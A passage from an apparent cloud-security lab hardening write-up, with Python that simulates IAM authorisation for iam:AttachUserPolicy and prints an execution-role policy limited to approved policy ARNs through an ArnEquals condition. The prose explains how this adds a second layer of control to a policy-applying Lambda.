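    """Simplified decision for an iam:AttachUserPolicy request under policy_doc.

    Deny by default; an Allow statement grants the request only if it names the
    action, the user ARN as resource, and (when present) the policy ARN in its
    iam:PolicyARN ArnEquals condition. Wildcards and Deny are not modelled."""
    for st in policy_doc["Statement"]:
        if st.get("Effect") != "Allow":
            continue
        if "iam:AttachUserPolicy" not in _as_list(st.get("Action", [])):
            continue
        if user_arn not in _as_list(st.get("Resource", [])):
            continue
        condition = st.get("Condition", {}).get("ArnEquals", {}).get("iam:PolicyARN")
        if condition is None or policy_arn in _as_list(condition):
            return True
    return False


if __name__ == "__main__":
    doc = build_execution_role_policy("739275444311", "cg-bilbo-cgid2bx1fsjdcs",
                                      "cgid2bx1fsjdcs-policy_applier_lambda1", APPROVED_POLICIES)
    print(json.dumps(doc, indent=2))
```

The same condition key works for iam:AttachRolePolicy and iam:AttachGroupPolicy, so the pattern generalizes to any "policy applier" that acts on behalf of less privileged callers: the approved list lives in IAM as well as in the application's database, and the two must both be bypassed before a privileged policy can be attached.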

 

 

 
